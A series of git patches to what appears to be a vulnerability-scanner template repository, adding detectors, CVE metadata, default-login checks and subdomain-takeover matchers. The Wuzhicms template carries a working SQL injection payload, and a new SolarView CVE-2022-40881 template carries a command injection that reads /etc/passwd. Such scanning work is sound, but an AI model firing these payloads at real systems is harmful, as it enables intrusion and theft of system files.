insertions(+) create mode 100644 technologies/hetzner-cloud-detect.yaml diff --git a/technologies/hetzner-cloud-detect.yaml b/technologies/hetzner-cloud-detect.yaml new file mode 100644 index 0000000000..e55a7a5e2d --- /dev/null +++ b/technologies/hetzner-cloud-detect.yaml @@ -0,0 +1,28 @@ +id: hetzner-cloud-detect + +info: + name: Hetzner Cloud - Detect + author: DhiyaneshDk + severity: info + metadata: + verified: true + shodan-query: title:"Hetzner Cloud" + tags: tech,hetzner + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Hetzner Cloud' + - 'Hetzner Logo' + condition: and + + - type: status + status: + - 200 From c945cb2c86aa708cd0441f3fe26fcc128b13bcf0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 17 Nov 2022 08:29:50 +0000 Subject: [PATCH 0389/1415] Auto Generated CVE annotations [Thu Nov 17 08:29:50 UTC 2022] :robot: --- cves/2022/CVE-2022-3484.yaml | 5 ++++- cves/2022/CVE-2022-3578.yaml | 5 ++++- 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml index f38e355c56..4398c2aae1 100644 --- a/cves/2022/CVE-2022-3484.yaml +++ b/cves/2022/CVE-2022-3484.yaml @@ -10,10 +10,13 @@ info: - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-3484 + cwe-id: CWE-79 metadata: - verified: true google-dork: inurl:wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php + verified: "true" tags: wp-plugin,xss,wpb-show-core,wpscan,cve,cve2022,wp,wordpress requests: diff --git a/cves/2022/CVE-2022-3578.yaml b/cves/2022/CVE-2022-3578.yaml index fa202c5b49..fb65fa2963 100644 --- a/cves/2022/CVE-2022-3578.yaml +++ b/cves/2022/CVE-2022-3578.yaml @@ -11,9 +11,12 @@ info: - https://wordpress.org/plugins/profilegrid-user-profiles-groups-and-communities/ - https://nvd.nist.gov/vuln/detail/CVE-2022-3578 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-3578 + cwe-id: CWE-79 metadata: - verified: true + verified: "true" tags: wp-plugin,wordpress,wpscan,cve,wp,xss,profilegrid,authenticated,cve2022 requests: From 4fd4f5e673709e98fc5341f2b3c23ed9fcfc891d Mon Sep 17 00:00:00 2001 From: sinKettu <avangard.jazz@gmail.com> Date: Thu, 17 Nov 2022 13:04:54 +0300 Subject: [PATCH 0390/1415] Tomcat Manager Exposed Panel: more flexible and accurate template --- default-logins/apache/tomcat-default-login.yaml | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 96a98e2ffa..de6baeacdb 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -2,7 +2,7 @@ id: tomcat-default-login info: name: Apache Tomcat Manager Default Login - author: pdteam + author: pdteam,sinKettu severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: @@ -68,9 +68,21 @@ requests: words: - "Apache Tomcat" - "Server Information" - - "Hostname" condition: and + - type: word + part: body + condition: or + words: + - "Tomcat Version" + - "JVM Version" + - "JVM Vendor" + - "OS Name" + - "OS Version" + - "OS Architecture" + - "Hostname" + - "IP Address" + - type: status status: - 200 From a5af14982fc80c997e7b4a54980b36635f9e3b24 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 17:02:33 +0530 Subject: [PATCH 0391/1415] Update wuzhicms-sqli.yaml --- vulnerabilities/other/wuzhicms-sqli.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index ac6f1c1c63..e06f71d9f1 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -20,17 +20,15 @@ variables: requests: - method: GET path: - - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20" + - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5({{num}})),0x7e),1)--%20" matchers-condition: and matchers: - type: word + part: body words: - 'c8c605999f3d8352d7bb792cf3fdb25' - part: body - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 From b3500789fe90e4a5b4edabfca4d70b1462987b31 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 17:08:30 +0530 Subject: [PATCH 0392/1415] Update wuzhicms-sqli.yaml --- vulnerabilities/other/wuzhicms-sqli.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/wuzhicms-sqli.yaml b/vulnerabilities/other/wuzhicms-sqli.yaml index e06f71d9f1..e9f5196811 100644 --- a/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/vulnerabilities/other/wuzhicms-sqli.yaml @@ -4,7 +4,8 @@ info: name: Wuzhicms 4.1.0 - SQL Injection author: princechaddha severity: critical - description: Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + description: | + Wuzhicms 4.1.0 contains a SQL injection vulnerability via the grouppid parameter of /coreframe/app/member/admin/group.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. reference: - https://github.com/wuzhicms/wuzhicms/issues/184 - https://vulners.com/cnvd/CNVD-2022-36985 @@ -12,6 +13,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-89 + metadata: + verified: true + shodan-query: http.html:"Wuzhicms" + fofa-query: title="Wuzhicms" tags: wuzhicms,sqli variables: From 1cc4db332fe02cf9c9a2672acbe058ece199f742 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 18:45:38 +0530 Subject: [PATCH 0394/1415] Update hetzner-cloud-detect.yaml --- technologies/hetzner-cloud-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/hetzner-cloud-detect.yaml b/technologies/hetzner-cloud-detect.yaml index e55a7a5e2d..bc62b8e1ac 100644 --- a/technologies/hetzner-cloud-detect.yaml +++ b/technologies/hetzner-cloud-detect.yaml @@ -1,7 +1,7 @@ id: hetzner-cloud-detect info: - name: Hetzner Cloud - Detect + name: Hetzner Cloud Detect author: DhiyaneshDk severity: info metadata: From 58f5bb79680b598e783ae5e143bfedaa8959a1ff Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 19:05:40 +0530 Subject: [PATCH 0395/1415] Update tooljet-default-login.yaml --- default-logins/tooljet/tooljet-default-login.yaml | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/default-logins/tooljet/tooljet-default-login.yaml b/default-logins/tooljet/tooljet-default-login.yaml index d0c6f45f4a..23c5fe9ff5 100644 --- a/default-logins/tooljet/tooljet-default-login.yaml +++ b/default-logins/tooljet/tooljet-default-login.yaml @@ -15,16 +15,10 @@ info: requests: - raw: - - |- + - | POST /api/authenticate HTTP/2 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0 - Accept: */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Referer: {{BaseURL}}/login?redirectTo=/ Content-Type: application/json - Origin: {{BaseURL}} {"email":"{{username}}","password":"{{password}}"} @@ -41,7 +35,7 @@ requests: part: body words: - '"auth_token":' - - '"org_environment_variable_delete":' + - 'admin":true' condition: and - type: word From 5023b9045c9384ac43a725212ce971aa7f11a699 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 19:21:08 +0530 Subject: [PATCH 0396/1415] Update tooljet-default-login.yaml --- default-logins/tooljet/tooljet-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/default-logins/tooljet/tooljet-default-login.yaml b/default-logins/tooljet/tooljet-default-login.yaml index 23c5fe9ff5..75273d654e 100644 --- a/default-logins/tooljet/tooljet-default-login.yaml +++ b/default-logins/tooljet/tooljet-default-login.yaml @@ -35,7 +35,7 @@ requests: part: body words: - '"auth_token":' - - 'admin":true' + - '"organization_id":' condition: and - type: word From 69a9be25cd37145d7851dea1526fe84db0bb719f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 17 Nov 2022 13:58:55 +0000 Subject: [PATCH 0397/1415] Auto Generated New Template Addition List [Thu Nov 17 13:58:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5b6ec0e867..e8ab7bda1c 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ cves/2022/CVE-2022-1442.yaml cves/2022/CVE-2022-2379.yaml cves/2022/CVE-2022-3484.yaml cves/2022/CVE-2022-3578.yaml +default-logins/tooljet/tooljet-default-login.yaml exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/wagtail-cms-detect.yaml From 39828b071ad624b51f0fa006baf64a209e24d0e0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 17 Nov 2022 19:39:47 +0530 Subject: [PATCH 0399/1415] Update apache-licenserc.yaml --- exposures/files/apache-licenserc.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/apache-licenserc.yaml b/exposures/files/apache-licenserc.yaml index 3f12647478..e4a3244678 100644 --- a/exposures/files/apache-licenserc.yaml +++ b/exposures/files/apache-licenserc.yaml @@ -1,7 +1,7 @@ id: apache-licenserc info: - name: Apache .licenserc.yaml + name: Apache License File author: DhiyaneshDk severity: low metadata: From 334c45b85dee6663ff0fbbb25df70969c8988cac Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 17 Nov 2022 14:12:30 +0000 Subject: [PATCH 0400/1415] Auto Generated New Template Addition List [Thu Nov 17 14:12:30 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e8ab7bda1c..f22292b227 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ exposed-panels/opencpu-panel.yaml exposed-panels/tekton-dashboard.yaml exposed-panels/wagtail-cms-detect.yaml exposed-panels/xibocms-login.yaml +exposures/files/apache-licenserc.yaml iot/pqube-power-analyzers.yaml misconfiguration/docmosis-tornado-server.yaml misconfiguration/installer/tasmota-install.yaml From 82cc251a5ee1715f4b3a19e2f41f564fefe55236 Mon Sep 17 00:00:00 2001 From: For3stCo1d <57119052+For3stCo1d@users.noreply.github.com> Date: Thu, 17 Nov 2022 22:32:59 +0800 Subject: [PATCH 0401/1415] Create CVE-2022-40881.yaml --- cves/2022/CVE-2022-40881.yaml | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2022/CVE-2022-40881.yaml diff --git a/cves/2022/CVE-2022-40881.yaml b/cves/2022/CVE-2022-40881.yaml new file mode 100644 index 0000000000..0d67fc7784 --- /dev/null +++ b/cves/2022/CVE-2022-40881.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-40881 + +info: + name: SolarView - Remote Command Execution + author: For3stCo1d + severity: critical + description: | + SolarView Compact 6.00 was discovered to contain a command injection vulnerability via network_test.php + reference: + - https://github.com/Timorlover/SolarView_Compact_6.0_rce_via_network_test.php + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40881 + metadata: + shodan-query: http.favicon.hash:"-244067125" + tags: cve,cve2022,solarview,rce + +variables: + cmd: "cat${IFS}/etc/passwd" + +requests: + - raw: + - | + POST /network_test.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + host=%0a{{cmd}}%0a&command=ping + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From e82d0f988026a44bc4b29b8e2f8db1895890e5e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Thu, 17 Nov 2022 21:13:27 +0530 Subject: [PATCH 0402/1415] Fixes Subdomain TKO False Positives (#6066) * updates * Update sprintful-takeover.yaml * Update netlify-takeover.yaml --- takeovers/aftership-takeover.yaml | 5 +++++ takeovers/agilecrm-takeover.yaml | 5 +++++ takeovers/aha-takeover.yaml | 5 +++++ takeovers/airee-takeover.yaml | 5 +++++ takeovers/anima-takeover.yaml | 5 +++++ takeovers/announcekit-takeover.yaml | 4 ++++ takeovers/aws-bucket-takeover.yaml | 4 ++++ takeovers/bigcartel-takeover.yaml | 4 ++++ takeovers/bitbucket-takeover.yaml | 4 ++++ takeovers/campaignmonitor.yaml | 5 +++++ takeovers/canny-takeover.yaml | 5 +++++ takeovers/cargo-takeover.yaml | 5 +++++ takeovers/cargocollective-takeover.yaml | 5 +++++ takeovers/feedpress-takeover.yaml | 5 +++++ takeovers/flexbe-takeover.yaml | 4 ++++ takeovers/flywheel-takeover.yaml | 2 +- takeovers/frontify-takeover.yaml | 5 +++++ takeovers/gemfury-takeover.yaml | 5 +++++ takeovers/getresponse-takeover.yaml | 5 +++++ takeovers/ghost-takeover.yaml | 4 ++++ takeovers/gitbook-takeover.yaml | 5 +++++ takeovers/github-takeover.yaml | 4 ++++ takeovers/hatenablog-takeover.yaml | 5 +++++ takeovers/helpjuice-takeover.yaml | 5 +++++ takeovers/helprace-takeover.yaml | 4 ++++ takeovers/helpscout-takeover.yaml | 4 ++++ takeovers/heroku-takeover.yaml | 5 +++++ takeovers/hubspot-takeover.yaml | 5 +++++ takeovers/intercom-takeover.yaml | 5 +++++ takeovers/jazzhr-takeover.yaml | 5 +++++ takeovers/jetbrains-takeover.yaml | 6 ++++++ takeovers/kinsta-takeover.yaml | 5 +++++ takeovers/launchrock-takeover.yaml | 5 +++++ takeovers/mashery-takeover.yaml | 5 +++++ takeovers/netlify-takeover.yaml | 4 ++++ takeovers/ngrok-takeover.yaml | 5 +++++ takeovers/pagewiz-takeover.yaml | 5 +++++ takeovers/pantheon-takeover.yaml | 5 +++++ takeovers/pingdom-takeover.yaml | 5 +++++ takeovers/proposify-takeover.yaml | 5 +++++ takeovers/readme-takeover.yaml | 5 +++++ takeovers/readthedocs-takeover.yaml | 5 +++++ takeovers/shopify-takeover.yaml | 4 ++++ takeovers/short-io.yaml | 6 ++++++ takeovers/simplebooklet-takeover.yaml | 5 +++++ takeovers/smartjob-takeover.yaml | 5 +++++ takeovers/smugmug-takeover.yaml | 5 +++++ takeovers/sprintful-takeover.yaml | 12 ++++++++---- takeovers/strikingly-takeover.yaml | 5 +++++ takeovers/surge-takeover.yaml | 5 +++++ takeovers/surveygizmo-takeover.yaml | 5 +++++ takeovers/surveysparrow-takeover.yaml | 5 +++++ takeovers/tave-takeover.yaml | 5 +++++ takeovers/teamwork-takeover.yaml | 5 +++++ takeovers/tictail-takeover.yaml | 5 +++++ takeovers/tilda-takeover.yaml | 4 ++++ takeovers/tumblr-takeover.yaml | 4 ++++ takeovers/uberflip-takeover.yaml | 5 +++++ takeovers/uptimerobot-takeover.yaml | 4 ++++ takeovers/uservoice-takeover.yaml | 5 +++++ takeovers/vend-takeover.yaml | 5 +++++ takeovers/webflow-takeover.yaml | 5 +++++ takeovers/wishpond-takeover.yaml | 5 +++++ takeovers/wix-takeover.yaml | 4 ++++ takeovers/wordpress-takeover.yaml | 4 ++++ takeovers/worksites-takeover.yaml | 5 +++++ takeovers/wufoo-takeover.yaml | 5 +++++ takeovers/zendesk-takeover.yaml | 5 +++++ 68 files changed, 325 insertions(+), 5 deletions(-) diff --git a/takeovers/aftership-takeover.yaml b/takeovers/aftership-takeover.yaml index 7db83c4367..067f169ffe 100644 --- a/takeovers/aftership-takeover.yaml +++ b/takeovers/aftership-takeover.yaml @@ -14,7 +14,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Oops.</h2><p class="text-muted text-tight">The page you're looking for doesn't exist. diff --git a/takeovers/agilecrm-takeover.yaml b/takeovers/agilecrm-takeover.yaml index 1aa0629707..f573aaffd5 100644 --- a/takeovers/agilecrm-takeover.yaml +++ b/takeovers/agilecrm-takeover.yaml @@ -14,7 +14,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Sorry, this page is no longer available. diff --git a/takeovers/aha-takeover.yaml b/takeovers/aha-takeover.yaml index dd4502fc63..248b7658b7 100644 --- a/takeovers/aha-takeover.yaml +++ b/takeovers/aha-takeover.yaml @@ -14,7 +14,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - There is no portal here ... sending you back to Aha! diff --git a/takeovers/airee-takeover.yaml b/takeovers/airee-takeover.yaml index 55adb6d9dc..42a3ee803e 100644 --- a/takeovers/airee-takeover.yaml +++ b/takeovers/airee-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word name: airee words: diff --git a/takeovers/anima-takeover.yaml b/takeovers/anima-takeover.yaml index 29deec0d6a..a15d48c1f6 100644 --- a/takeovers/anima-takeover.yaml +++ b/takeovers/anima-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "If this is your website and you've just created it, try refreshing in a minute" \ No newline at end of file diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml index b0eaa68779..4f52d90937 100644 --- a/takeovers/announcekit-takeover.yaml +++ b/takeovers/announcekit-takeover.yaml @@ -16,6 +16,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Error 404 - AnnounceKit' diff --git a/takeovers/aws-bucket-takeover.yaml b/takeovers/aws-bucket-takeover.yaml index 4a7e880937..7eb506e5c5 100644 --- a/takeovers/aws-bucket-takeover.yaml +++ b/takeovers/aws-bucket-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "The specified bucket does not exist" diff --git a/takeovers/bigcartel-takeover.yaml b/takeovers/bigcartel-takeover.yaml index c5bc008cff..f696dc0946 100644 --- a/takeovers/bigcartel-takeover.yaml +++ b/takeovers/bigcartel-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "<h1>Oops! We couldn’t find that page.</h1>" diff --git a/takeovers/bitbucket-takeover.yaml b/takeovers/bitbucket-takeover.yaml index 9d027b93b1..c9750d8712 100644 --- a/takeovers/bitbucket-takeover.yaml +++ b/takeovers/bitbucket-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Repository not found" diff --git a/takeovers/campaignmonitor.yaml b/takeovers/campaignmonitor.yaml index f42a815a82..5582631239 100644 --- a/takeovers/campaignmonitor.yaml +++ b/takeovers/campaignmonitor.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - '<strong>Trying to access your account?</strong>' diff --git a/takeovers/canny-takeover.yaml b/takeovers/canny-takeover.yaml index c321c4178b..8f7c242e09 100644 --- a/takeovers/canny-takeover.yaml +++ b/takeovers/canny-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'Company Not Found' diff --git a/takeovers/cargo-takeover.yaml b/takeovers/cargo-takeover.yaml index 1b1f4c8b31..d2549b6125 100644 --- a/takeovers/cargo-takeover.yaml +++ b/takeovers/cargo-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel." \ No newline at end of file diff --git a/takeovers/cargocollective-takeover.yaml b/takeovers/cargocollective-takeover.yaml index b5c01e1ad1..d2a82d8034 100644 --- a/takeovers/cargocollective-takeover.yaml +++ b/takeovers/cargocollective-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - '<div class="notfound">' diff --git a/takeovers/feedpress-takeover.yaml b/takeovers/feedpress-takeover.yaml index 79351d85a1..502704b37a 100644 --- a/takeovers/feedpress-takeover.yaml +++ b/takeovers/feedpress-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'The feed has not been found.' \ No newline at end of file diff --git a/takeovers/flexbe-takeover.yaml b/takeovers/flexbe-takeover.yaml index ccc8fd4622..956f5b6d69 100644 --- a/takeovers/flexbe-takeover.yaml +++ b/takeovers/flexbe-takeover.yaml @@ -16,6 +16,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word condition: and words: diff --git a/takeovers/flywheel-takeover.yaml b/takeovers/flywheel-takeover.yaml index a1eac2938d..14a752d6c0 100644 --- a/takeovers/flywheel-takeover.yaml +++ b/takeovers/flywheel-takeover.yaml @@ -28,4 +28,4 @@ requests: - type: word part: body words: - - "We are sorry, you've landed on a page that is hosted by Flywheel" + - "We are sorry, you've landed on a page that is hosted by Flywheel" \ No newline at end of file diff --git a/takeovers/frontify-takeover.yaml b/takeovers/frontify-takeover.yaml index d6b727ab18..102273a6c0 100644 --- a/takeovers/frontify-takeover.yaml +++ b/takeovers/frontify-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 404 - Page Not Found diff --git a/takeovers/gemfury-takeover.yaml b/takeovers/gemfury-takeover.yaml index 96151a0c52..5dccf7eaff 100644 --- a/takeovers/gemfury-takeover.yaml +++ b/takeovers/gemfury-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "404: This page could not be found." \ No newline at end of file diff --git a/takeovers/getresponse-takeover.yaml b/takeovers/getresponse-takeover.yaml index 9a8beb2b3e..005c64d379 100644 --- a/takeovers/getresponse-takeover.yaml +++ b/takeovers/getresponse-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 'With GetResponse Landing Pages, lead generation has never been easier' \ No newline at end of file diff --git a/takeovers/ghost-takeover.yaml b/takeovers/ghost-takeover.yaml index 0545881e81..638ab1e2aa 100644 --- a/takeovers/ghost-takeover.yaml +++ b/takeovers/ghost-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word part: header words: diff --git a/takeovers/gitbook-takeover.yaml b/takeovers/gitbook-takeover.yaml index 09f8d9062d..21c21d1ac4 100644 --- a/takeovers/gitbook-takeover.yaml +++ b/takeovers/gitbook-takeover.yaml @@ -14,7 +14,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "If you need specifics, here's the error" diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 9ae4f7e121..8bc65bd66c 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -15,6 +15,10 @@ requests: matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "There isn't a GitHub Pages site here." diff --git a/takeovers/hatenablog-takeover.yaml b/takeovers/hatenablog-takeover.yaml index 2c1a6663a9..2edbcc511f 100644 --- a/takeovers/hatenablog-takeover.yaml +++ b/takeovers/hatenablog-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - 404 Blog is not found \ No newline at end of file diff --git a/takeovers/helpjuice-takeover.yaml b/takeovers/helpjuice-takeover.yaml index 56f19965bd..9256eeb489 100644 --- a/takeovers/helpjuice-takeover.yaml +++ b/takeovers/helpjuice-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - We could not find what you're looking for. \ No newline at end of file diff --git a/takeovers/helprace-takeover.yaml b/takeovers/helprace-takeover.yaml index 8853e92ac3..e7ea585d66 100644 --- a/takeovers/helprace-takeover.yaml +++ b/takeovers/helprace-takeover.yaml @@ -13,7 +13,11 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip - type: word words: diff --git a/takeovers/helpscout-takeover.yaml b/takeovers/helpscout-takeover.yaml index e95bf4b489..57d9b317f1 100644 --- a/takeovers/helpscout-takeover.yaml +++ b/takeovers/helpscout-takeover.yaml @@ -13,7 +13,11 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip - type: word words: diff --git a/takeovers/heroku-takeover.yaml b/takeovers/heroku-takeover.yaml index 109f2e9a77..318a0da558 100644 --- a/takeovers/heroku-takeover.yaml +++ b/takeovers/heroku-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "herokucdn.com/error-pages/no-such-app.html" diff --git a/takeovers/hubspot-takeover.yaml b/takeovers/hubspot-takeover.yaml index 9b3580a796..56b3143323 100644 --- a/takeovers/hubspot-takeover.yaml +++ b/takeovers/hubspot-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - "Domain not found" diff --git a/takeovers/intercom-takeover.yaml b/takeovers/intercom-takeover.yaml index 3ea03ebd65..355b8245cc 100644 --- a/takeovers/intercom-takeover.yaml +++ b/takeovers/intercom-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - '<h1 class="headline">Uh oh. That page doesn\’t exist.</h1>' diff --git a/takeovers/jazzhr-takeover.yaml b/takeovers/jazzhr-takeover.yaml index b238336e47..3292222c7f 100644 --- a/takeovers/jazzhr-takeover.yaml +++ b/takeovers/jazzhr-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - This account no longer active \ No newline at end of file diff --git a/takeovers/jetbrains-takeover.yaml b/takeovers/jetbrains-takeover.yaml index 4c7607baa0..5bca3b0b3d 100644 --- a/takeovers/jetbrains-takeover.yaml +++ b/takeovers/jetbrains-takeover.yaml @@ -12,7 +12,13 @@ requests: - method: GET path: - "{{BaseURL}}" + + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - is not a registered InCloud YouTrack. diff --git a/takeovers/kinsta-takeover.yaml b/takeovers/kinsta-takeover.yaml index 6fc25f75af..68a7ae267a 100644 --- a/takeovers/kinsta-takeover.yaml +++ b/takeovers/kinsta-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - No Site For Domain \ No newline at end of file diff --git a/takeovers/launchrock-takeover.yaml b/takeovers/launchrock-takeover.yaml index 85e64c034b..6cfd145cf2 100644 --- a/takeovers/launchrock-takeover.yaml +++ b/takeovers/launchrock-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file diff --git a/takeovers/mashery-takeover.yaml b/takeovers/mashery-takeover.yaml index 0f7b8239e5..82cb049a6d 100644 --- a/takeovers/mashery-takeover.yaml +++ b/takeovers/mashery-takeover.yaml @@ -13,7 +13,12 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: + - type: dsl + dsl: + - Host != ip + - type: word words: - Unrecognized domain <strong> \ No newline at end of file diff --git a/takeovers/netlify-takeover.yaml b/takeovers/netlify-takeover.yaml index 